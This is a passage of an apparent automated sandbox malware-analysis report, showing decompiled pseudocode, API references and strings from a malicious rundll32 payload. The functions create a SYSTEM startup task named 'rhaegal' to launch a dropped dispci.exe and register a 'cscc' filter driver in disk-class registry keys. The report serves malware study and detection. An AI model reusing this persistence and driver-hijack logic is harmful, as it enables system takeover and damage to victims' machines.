                                                                                                          						Sleep(_a8 * 0x3e8); // executed
                                                                                                          					}
                                                                                                          					goto L9;
                                                                                                          				} else {
                                                                                                          					L9:
                                                                                                          					return _t38;
                                                                                                          				}
                                                                                                          			}















                                                                                                          0x04a47fd4
                                                                                                          0x04a47fd6
                                                                                                          0x04a47fe1
                                                                                                          0x04a48002
                                                                                                          0x04a4802e
                                                                                                          0x04a4802f
                                                                                                          0x04a48032
                                                                                                          0x04a48032
                                                                                                          0x04a48034
                                                                                                          0x04a48035
                                                                                                          0x04a48035
                                                                                                          0x04a4803a
                                                                                                          0x04a4803b
                                                                                                          0x04a4803d
                                                                                                          0x04a48040
                                                                                                          0x04a48040
                                                                                                          0x04a48042
                                                                                                          0x04a48043
                                                                                                          0x04a48043
                                                                                                          0x04a48066
                                                                                                          0x04a48069
                                                                                                          0x04a4806f
                                                                                                          0x04a48073
                                                                                                          0x04a4807f
                                                                                                          0x04a4807f
                                                                                                          0x00000000
                                                                                                          0x04a48085
                                                                                                          0x04a48085
                                                                                                          0x04a4808b
                                                                                                          0x04a4808b

                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 04A47FD6
                                                                                                          • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04A47FFA
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A4800C
                                                                                                          • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04A48022
                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04A48069
                                                                                                          • Sleep.KERNELBASE(00000000), ref: 04A4807F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                                                          • String ID: /c %ws$ComSpec$\cmd.exe
                                                                                                          • API String ID: 1518394870-1564754240
                                                                                                          • Opcode ID: d57aacfb0e133377fa78b004ec438c864e47b69a92ed58fd3f9a619dccf18e51
                                                                                                          • Instruction ID: a3b72e50ba4049ccbc5b58afb57d4474fe248954f413a8853c3fc97df505c2c5
                                                                                                          • Opcode Fuzzy Hash: d57aacfb0e133377fa78b004ec438c864e47b69a92ed58fd3f9a619dccf18e51
                                                                                                          • Instruction Fuzzy Hash: C821CC766001086FEB10DFA4DC88EEF776DEBE4345F104466F945E6140E639DE498B30
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A41000(void* __eflags, intOrPtr _a4) {
                                                                                                          				short _v524;
                                                                                                          				short _v1564;
                                                                                                          				void* _t8;
                                                                                                          				signed int _t15;
                                                                                                          				signed int _t21;
                                                                                                          
                                                                                                          				_t21 = 0;
                                                                                                          				_t8 = E04A47FB7(L"schtasks /Delete /F /TN rhaegal", 0); // executed
                                                                                                          				if(_t8 != 0) {
                                                                                                          					Sleep(0x7d0); // executed
                                                                                                          				}
                                                                                                          				if(GetEnvironmentVariableW(L"ComSpec",  &_v524, 0x104) != 0 || GetSystemDirectoryW( &_v524, 0x104) != 0 && lstrcatW( &_v524, L"\\cmd.exe") != 0) {
                                                                                                          					wsprintfW( &_v1564, L"schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"",  &_v524, _a4,  *0x4a57bbc);
                                                                                                          					_t15 = E04A47FB7( &_v1564, _t21); // executed
                                                                                                          					_t21 = _t15;
                                                                                                          				}
                                                                                                          				return _t21;
                                                                                                          			}








                                                                                                          0x04a4100b
                                                                                                          0x04a41013
                                                                                                          0x04a4101a
                                                                                                          0x04a41021
                                                                                                          0x04a41021
                                                                                                          0x04a41041
                                                                                                          0x04a41087
                                                                                                          0x04a41098
                                                                                                          0x04a4109d
                                                                                                          0x04a4109d
                                                                                                          0x04a410a4

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A47FB7: wsprintfW.USER32 ref: 04A47FD6
                                                                                                            • Part of subcall function 04A47FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04A47FFA
                                                                                                            • Part of subcall function 04A47FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A4800C
                                                                                                            • Part of subcall function 04A47FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04A48022
                                                                                                            • Part of subcall function 04A47FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04A48069
                                                                                                            • Part of subcall function 04A47FB7: Sleep.KERNELBASE(00000000), ref: 04A4807F
                                                                                                          • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04A41021
                                                                                                          • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04A41039
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04A4104B
                                                                                                          • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04A41061
                                                                                                          • wsprintfW.USER32 ref: 04A41087
                                                                                                          Strings
                                                                                                          • \cmd.exe, xrefs: 04A41055
                                                                                                          • ComSpec, xrefs: 04A41034
                                                                                                          • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04A41081
                                                                                                          • schtasks /Delete /F /TN rhaegal, xrefs: 04A4100E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                                                          • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                                                          • API String ID: 2538701606-2521368254
                                                                                                          • Opcode ID: 5ab0577c86f5f14d8baa7f5c81c4da490459f74c1dbae5a60f7bff68849a83df
                                                                                                          • Instruction ID: 5c184cc172b73ba4e7bac8b284211066a7037ce32f1c7c0d3917ba7981409084
                                                                                                          • Opcode Fuzzy Hash: 5ab0577c86f5f14d8baa7f5c81c4da490459f74c1dbae5a60f7bff68849a83df
                                                                                                          • Instruction Fuzzy Hash: B6019E7A6002687BEB209B759C0CEDF7ABDEBD4705F000061FD09E2141EA35EA85CBB0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A41531() {
                                                                                                          				void* _t3;
                                                                                                          				void* _t4;
                                                                                                          				void* _t5;
                                                                                                          				void* _t7;
                                                                                                          				void* _t9;
                                                                                                          				signed int _t11;
                                                                                                          				void* _t13;
                                                                                                          
                                                                                                          				_t3 = 0;
                                                                                                          				do {
                                                                                                          					_t11 =  *(_t3 + L"cscc") & 0x0000ffff;
                                                                                                          					 *(_t3 + L"cscc") = _t11;
                                                                                                          					_t3 = _t3 + 2;
                                                                                                          				} while (_t11 != 0);
                                                                                                          				_t4 = E04A41368(_t11); // executed
                                                                                                          				_t13 = _t4;
                                                                                                          				if(_t13 == 0 || E04A413E8() != 0) {
                                                                                                          					_t5 = E04A411EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", L"LowerFilters"); // executed
                                                                                                          					_t13 = _t5;
                                                                                                          					if(_t13 == 0) {
                                                                                                          						_t7 = E04A411EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", L"UpperFilters"); // executed
                                                                                                          						_t13 = _t7;
                                                                                                          						if(_t13 == 0 && GetVersion() >= 6) {
                                                                                                          							_t9 = E04A411EF(L"SYSTEM\\CurrentControlSet\\Control\\CrashControl", L"DumpFilters"); // executed
                                                                                                          							_t13 = _t9;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t13;
                                                                                                          			}










                                                                                                          0x04a41531
                                                                                                          0x04a41533
                                                                                                          0x04a41533
                                                                                                          0x04a4153a
                                                                                                          0x04a41541
                                                                                                          0x04a41544
                                                                                                          0x04a4154a
                                                                                                          0x04a4154f
                                                                                                          0x04a41553
                                                                                                          0x04a41568
                                                                                                          0x04a4156d
                                                                                                          0x04a41571
                                                                                                          0x04a4157d
                                                                                                          0x04a41582
                                                                                                          0x04a41586
                                                                                                          0x04a4159c
                                                                                                          0x04a415a1
                                                                                                          0x04a415a1
                                                                                                          0x04a41586
                                                                                                          0x04a41571
                                                                                                          0x04a415a6

                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,04A411D0,?,?,?), ref: 04A41588
                                                                                                          Strings
                                                                                                          • cscc, xrefs: 04A41533
                                                                                                          • cscc, xrefs: 04A4153A
                                                                                                          • DumpFilters, xrefs: 04A41592
                                                                                                          • UpperFilters, xrefs: 04A41573
                                                                                                          • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04A41563
                                                                                                          • LowerFilters, xrefs: 04A4155E
                                                                                                          • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04A41578
                                                                                                          • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04A41597
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Version
                                                                                                          • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                                                                                          • API String ID: 1889659487-625840244
                                                                                                          • Opcode ID: b2e7a0c471abc348f02caef47bf4613483fc89cb1d38ff010feb52b3097b80f3
                                                                                                          • Instruction ID: 7705fefd4e901b337cfbe7ddedaa1fe701202ff14fb9dacb60b6e7e17f90aaa5
                                                                                                          • Opcode Fuzzy Hash: b2e7a0c471abc348f02caef47bf4613483fc89cb1d38ff010feb52b3097b80f3
                                                                                                          • Instruction Fuzzy Hash: 70F08932FC6722371BF137E8AB1D9DD00916FC4BA83050194EC42BB515EAA0FEC18692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 96%
                                                                                                          			E04A411EF(int _a4, short* _a8) {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				int _v16;
                                                                                                          				char _v2064;
                                                                                                          				long _t42;
                                                                                                          				intOrPtr* _t43;
                                                                                                          				long _t49;
                                                                                                          				long _t60;
                                                                                                          				char* _t62;
                                                                                                          				char* _t63;
                                                                                                          				int _t68;
                                                                                                          				intOrPtr _t70;
                                                                                                          				intOrPtr* _t71;
                                                                                                          				char _t72;
                                                                                                          				int _t73;
                                                                                                          				void* _t74;
                                                                                                          				char _t75;
                                                                                                          				char* _t76;
                                                                                                          				char _t77;
                                                                                                          				char* _t79;
                                                                                                          				void* _t81;
                                                                                                          
                                                                                                          				_t42 = RegOpenKeyW(0x80000002, _a4,  &_v12); // executed
                                                                                                          				if(_t42 != 0) {
                                                                                                          					return _t42;
                                                                                                          				}
                                                                                                          				_t43 = L"cscc";
                                                                                                          				_t74 = _t43 + 2;
                                                                                                          				do {
                                                                                                          					_t70 =  *_t43;
                                                                                                          					_t43 = _t43 + 2;
                                                                                                          				} while (_t70 != 0);
                                                                                                          				_t68 = (_t43 - _t74 >> 1) + (_t43 - _t74 >> 1) + 2;
                                                                                                          				_t79 =  &_v2064;
                                                                                                          				_a4 = 0x800;
                                                                                                          				_t49 = RegQueryValueExW(_v12, _a8, 0,  &_v16, _t79,  &_a4); // executed
                                                                                                          				_v8 = _t49;
                                                                                                          				if(_t49 == 0) {
                                                                                                          					if(_v16 != 7 || _a4 + _t68 > 0x800) {
                                                                                                          						_v8 = 0x65d;
                                                                                                          						goto L23;
                                                                                                          					} else {
                                                                                                          						if(_v2064 == 0) {
                                                                                                          							L20:
                                                                                                          							memmove(_t81 + _t68 - 0x80c,  &_v2064, _a4);
                                                                                                          							memcpy( &_v2064, L"cscc", _t68);
                                                                                                          							_a4 = _a4 + _t68;
                                                                                                          							_t60 = RegSetValueExW(_v12, _a8, 0, 7,  &_v2064, _a4); // executed
                                                                                                          							_v8 = _t60;
                                                                                                          							if(_t60 == 0) {
                                                                                                          								_v8 = RegFlushKey(_v12);
                                                                                                          							}
                                                                                                          							L23:
                                                                                                          							RegCloseKey(_v12); // executed
                                                                                                          							return _v8;
                                                                                                          						} else {
                                                                                                          							goto L9;
                                                                                                          						}
                                                                                                          						do {
                                                                                                          							L9:
                                                                                                          							_t71 = L"cscc";
                                                                                                          							_t62 = _t79;
                                                                                                          							while(1) {
                                                                                                          								_t75 =  *_t62;
                                                                                                          								if(_t75 !=  *_t71) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								if(_t75 == 0) {
                                                                                                          									L14:
                                                                                                          									_t62 = 0;
                                                                                                          									L16:
                                                                                                          									if(_t62 == 0) {
                                                                                                          										goto L23;
                                                                                                          									}
                                                                                                          									_t63 = _t79;
                                                                                                          									_t76 =  &(_t63[2]);
                                                                                                          									do {
                                                                                                          										_t72 =  *_t63;
                                                                                                          										_t63 =  &(_t63[2]);
                                                                                                          									} while (_t72 != 0);
                                                                                                          									goto L19;
                                                                                                          								}
                                                                                                          								_t77 = _t62[2];
                                                                                                          								if(_t77 !=  *((intOrPtr*)(_t71 + 2))) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								_t62 =  &(_t62[4]);
                                                                                                          								_t71 = _t71 + 4;
                                                                                                          								if(_t77 != 0) {
                                                                                                          									continue;
                                                                                                          								}
                                                                                                          								goto L14;
                                                                                                          							}
                                                                                                          							asm("sbb eax, eax");
                                                                                                          							asm("sbb eax, 0xffffffff");
                                                                                                          							goto L16;
                                                                                                          							L19:
                                                                                                          							_t79 =  &(_t79[2 + (_t63 - _t76 >> 1) * 2]);
                                                                                                          						} while ( *_t79 != _t72);
                                                                                                          						goto L20;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t73 = 2;
                                                                                                          				if(_t49 != _t73) {
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				_v2064 = 0;
                                                                                                          				_a4 = _t73;
                                                                                                          				goto L20;
                                                                                                          			}
























                                                                                                          0x04a41204
                                                                                                          0x04a4120c
                                                                                                          0x04a41365
                                                                                                          0x04a41365
                                                                                                          0x04a41212
                                                                                                          0x04a41217
                                                                                                          0x04a4121a
                                                                                                          0x04a4121a
                                                                                                          0x04a4121d
                                                                                                          0x04a41220
                                                                                                          0x04a4122b
                                                                                                          0x04a41233
                                                                                                          0x04a41245
                                                                                                          0x04a4124f
                                                                                                          0x04a41255
                                                                                                          0x04a4125a
                                                                                                          0x04a41279
                                                                                                          0x04a4134f
                                                                                                          0x00000000
                                                                                                          0x04a4128f
                                                                                                          0x04a41297
                                                                                                          0x04a412f0
                                                                                                          0x04a41302
                                                                                                          0x04a41315
                                                                                                          0x04a4131a
                                                                                                          0x04a41334
                                                                                                          0x04a4133a
                                                                                                          0x04a4133f
                                                                                                          0x04a4134a
                                                                                                          0x04a4134a
                                                                                                          0x04a41356
                                                                                                          0x04a41359
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41299
                                                                                                          0x04a41299
                                                                                                          0x04a41299
                                                                                                          0x04a4129e
                                                                                                          0x04a412a0
                                                                                                          0x04a412a0
                                                                                                          0x04a412a6
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a412ab
                                                                                                          0x04a412c2
                                                                                                          0x04a412c2
                                                                                                          0x04a412cb
                                                                                                          0x04a412cd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a412d3
                                                                                                          0x04a412d5
                                                                                                          0x04a412d8
                                                                                                          0x04a412d8
                                                                                                          0x04a412db
                                                                                                          0x04a412de
                                                                                                          0x00000000
                                                                                                          0x04a412d8
                                                                                                          0x04a412ad
                                                                                                          0x04a412b5
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a412b7
                                                                                                          0x04a412ba
                                                                                                          0x04a412c0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a412c0
                                                                                                          0x04a412c6
                                                                                                          0x04a412c8
                                                                                                          0x00000000
                                                                                                          0x04a412e3
                                                                                                          0x04a412e7
                                                                                                          0x04a412eb
                                                                                                          0x00000000
                                                                                                          0x04a41299
                                                                                                          0x04a41279
                                                                                                          0x04a4125e
                                                                                                          0x04a41261
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41269
                                                                                                          0x04a41270
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04A41204
                                                                                                          • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 04A4124F
                                                                                                          • memmove.MSVCRT ref: 04A41302
                                                                                                          • memcpy.MSVCRT ref: 04A41315
                                                                                                          • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04A41334
                                                                                                          • RegFlushKey.ADVAPI32(00000800), ref: 04A41344
                                                                                                          • RegCloseKey.KERNELBASE(00000800), ref: 04A41359
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                                                          • String ID: cscc
                                                                                                          • API String ID: 3731182797-3289078142
                                                                                                          • Opcode ID: 9951b0b32dd6b7270e94f550ad87818ba484c3e917136189ae5d63103c863695
                                                                                                          • Instruction ID: 4146d7e69c0db0e1b58e07d9e1623e8c27e5af40b3a9d7f6b1ff73e2181ef40c
                                                                                                          • Opcode Fuzzy Hash: 9951b0b32dd6b7270e94f550ad87818ba484c3e917136189ae5d63103c863695
                                                                                                          • Instruction Fuzzy Hash: 90418C75A00109EBDF209FA4CC08AEE7BB9FBD4784F008165E945EB550E731FA85CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 79%
                                                                                                          			E04A410A7() {
                                                                                                          				void* _v8;
                                                                                                          				char _v12;
                                                                                                          				short _v532;
                                                                                                          				short _v1052;
                                                                                                          				void* __ebx;
                                                                                                          				signed int _t37;
                                                                                                          				void* _t38;
                                                                                                          				signed int _t41;
                                                                                                          				void* _t42;
                                                                                                          				void* _t43;
                                                                                                          				void* _t49;
                                                                                                          				intOrPtr* _t55;
                                                                                                          				void* _t58;
                                                                                                          				intOrPtr* _t59;
                                                                                                          				signed char _t62;
                                                                                                          				signed int _t64;
                                                                                                          				signed int _t65;
                                                                                                          				signed int _t66;
                                                                                                          				intOrPtr _t67;
                                                                                                          				intOrPtr _t69;
                                                                                                          				short _t70;
                                                                                                          				void* _t71;
                                                                                                          				void* _t72;
                                                                                                          				short _t73;
                                                                                                          				void* _t75;
                                                                                                          
                                                                                                          				_t62 = 2;
                                                                                                          				_t73 = 0;
                                                                                                          				if(( *0x4a57bc0 & _t62) == 0) {
                                                                                                          					L20:
                                                                                                          					return _t73;
                                                                                                          				}
                                                                                                          				if(( *0x4a57b7c & 0x00000040) != 0) {
                                                                                                          					_t37 = 0;
                                                                                                          					__eflags = 0;
                                                                                                          					do {
                                                                                                          						_t17 = _t37 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                          						_t64 =  *_t17 & 0x0000ffff;
                                                                                                          						 *(_t75 + _t37 - 0x210) = _t64;
                                                                                                          						_t37 = _t37 + _t62;
                                                                                                          						__eflags = _t64;
                                                                                                          					} while (_t64 != 0);
                                                                                                          				} else {
                                                                                                          					ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%",  &_v532, 0x104);
                                                                                                          					_t55 =  &_v532;
                                                                                                          					_t71 = _t55 + 2;
                                                                                                          					do {
                                                                                                          						_t67 =  *_t55;
                                                                                                          						_t55 = _t55 + _t62;
                                                                                                          					} while (_t67 != 0);
                                                                                                          					_t58 = (_t55 - _t71 >> 1) + (_t55 - _t71 >> 1);
                                                                                                          					if( *((short*)(_t75 + _t58 - 0x212)) == 0x5c) {
                                                                                                          						L10:
                                                                                                          						_t38 = 0;
                                                                                                          						do {
                                                                                                          							_t65 =  *(_t75 + _t38 - 0x210) & 0x0000ffff;
                                                                                                          							 *(_t75 + _t38 - 0x418) = _t65;
                                                                                                          							_t38 = _t38 + _t62;
                                                                                                          						} while (_t65 != 0);
                                                                                                          						_push( &_v12);
                                                                                                          						_push( &_v8);
                                                                                                          						_t41 = 9; // executed
                                                                                                          						_t42 = E04A48313(_t41); // executed
                                                                                                          						if(_t42 == 0) {
                                                                                                          							goto L20;
                                                                                                          						}
                                                                                                          						_t43 = 0;
                                                                                                          						do {
                                                                                                          							_t66 =  *(_t75 + _t43 - 0x210) & 0x0000ffff;
                                                                                                          							 *(_t75 + _t43 - 0x418) = _t66;
                                                                                                          							_t43 = _t43 + _t62;
                                                                                                          						} while (_t66 != 0);
                                                                                                          						if(PathAppendW( &_v1052, L"dispci.exe") != 0) {
                                                                                                          							_t49 = E04A487E7(_v12,  &_v1052, _v8); // executed
                                                                                                          							_t88 = _t49;
                                                                                                          							if(_t49 != 0) {
                                                                                                          								E04A41000(_t88,  &_v532); // executed
                                                                                                          								if(E04A41531() == 0) {
                                                                                                          									_t73 = 1;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
                                                                                                          						goto L20;
                                                                                                          					}
                                                                                                          					 *((short*)(_t75 + _t58 - 0x20e)) = 0;
                                                                                                          					_t59 =  &_v532;
                                                                                                          					_t72 = _t59 + 2;
                                                                                                          					do {
                                                                                                          						_t69 =  *_t59;
                                                                                                          						_t59 = _t59 + _t62;
                                                                                                          					} while (_t69 != 0);
                                                                                                          					_t70 = 0x5c;
                                                                                                          					 *((short*)(_t75 + (_t59 - _t72 >> 1) * 2 - 0x210)) = _t70;
                                                                                                          				}
                                                                                                          			}




























                                                                                                          0x04a410b4
                                                                                                          0x04a410b5
                                                                                                          0x04a410bd
                                                                                                          0x04a411e9
                                                                                                          0x04a411ee
                                                                                                          0x04a411ee
                                                                                                          0x04a410ca
                                                                                                          0x04a41135
                                                                                                          0x04a41135
                                                                                                          0x04a41137
                                                                                                          0x04a41137
                                                                                                          0x04a41137
                                                                                                          0x04a4113e
                                                                                                          0x04a41146
                                                                                                          0x04a41148
                                                                                                          0x04a41148
                                                                                                          0x04a410cc
                                                                                                          0x04a410dd
                                                                                                          0x04a410e3
                                                                                                          0x04a410e9
                                                                                                          0x04a410ec
                                                                                                          0x04a410ec
                                                                                                          0x04a410ef
                                                                                                          0x04a410f1
                                                                                                          0x04a410fa
                                                                                                          0x04a41105
                                                                                                          0x04a4114d
                                                                                                          0x04a4114d
                                                                                                          0x04a4114f
                                                                                                          0x04a4114f
                                                                                                          0x04a41157
                                                                                                          0x04a4115f
                                                                                                          0x04a41161
                                                                                                          0x04a41169
                                                                                                          0x04a4116d
                                                                                                          0x04a41170
                                                                                                          0x04a41171
                                                                                                          0x04a41178
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4117a
                                                                                                          0x04a4117c
                                                                                                          0x04a4117c
                                                                                                          0x04a41184
                                                                                                          0x04a4118c
                                                                                                          0x04a4118e
                                                                                                          0x04a411a7
                                                                                                          0x04a411b6
                                                                                                          0x04a411bb
                                                                                                          0x04a411bd
                                                                                                          0x04a411c6
                                                                                                          0x04a411d2
                                                                                                          0x04a411d6
                                                                                                          0x04a411d6
                                                                                                          0x04a411d2
                                                                                                          0x04a411bd
                                                                                                          0x04a411e3
                                                                                                          0x00000000
                                                                                                          0x04a411e3
                                                                                                          0x04a41109
                                                                                                          0x04a41111
                                                                                                          0x04a41117
                                                                                                          0x04a4111a
                                                                                                          0x04a4111a
                                                                                                          0x04a4111d
                                                                                                          0x04a4111f
                                                                                                          0x04a4112a
                                                                                                          0x04a4112b
                                                                                                          0x04a4112b

                                                                                                          APIs
                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 04A410DD
                                                                                                          • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 04A4119F
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A411DC
                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 04A411E3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                                                          • String ID: Oqt Uqt0Xqt$%ALLUSERSPROFILE%$\$dispci.exe
                                                                                                          • API String ID: 1077166327-3606562691
                                                                                                          • Opcode ID: 911e35d86ea92c498b42ca5150d1ecd31bee0b0db9cb01422543b60d6671c584
                                                                                                          • Instruction ID: 5a8d25ecba2c35484c5d89fc4b852d7e60e1ad0bba97a84fcbea430a7054a4fd
                                                                                                          • Opcode Fuzzy Hash: 911e35d86ea92c498b42ca5150d1ecd31bee0b0db9cb01422543b60d6671c584
                                                                                                          • Instruction Fuzzy Hash: 4E31CF3524020E9ADB10AFEC9D9DBEE76B8FFD4744F1448B8E905C3191E378AAC48B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 83%
                                                                                                          			E04A477D1() {
                                                                                                          				char _v8;
                                                                                                          				char _v528;
                                                                                                          				char* _t12;
                                                                                                          				void* _t13;
                                                                                                          				void* _t21;
                                                                                                          				void* _t24;
